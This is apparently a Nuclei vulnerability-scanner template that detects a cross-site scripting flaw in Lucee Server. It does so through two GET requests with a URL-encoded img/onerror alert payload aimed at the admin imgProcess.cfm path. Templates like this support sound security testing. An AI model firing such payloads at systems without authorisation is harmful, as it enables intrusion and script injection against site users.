id: lucee-xss info: name: Lucee - Cross-Site Scripting author: incogbyte severity: high description: Lucee contains a cross-site scripting vulnerability. It allows remote attackers to inject arbitrary JavaScript into the responses returned by the server. reference: - https://www.acunetix.com/vulnerabilities/web/lucee-server-arbitrary-file-creation/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 tags: lucee,xss,unauth metadata: max-request: 2 http: - method: GET path: - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm" - "{{BaseURL}}/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "" - "MissingIncludeException" - "lucee-err" part: body condition: and # Enhanced by mp on 2022/09/23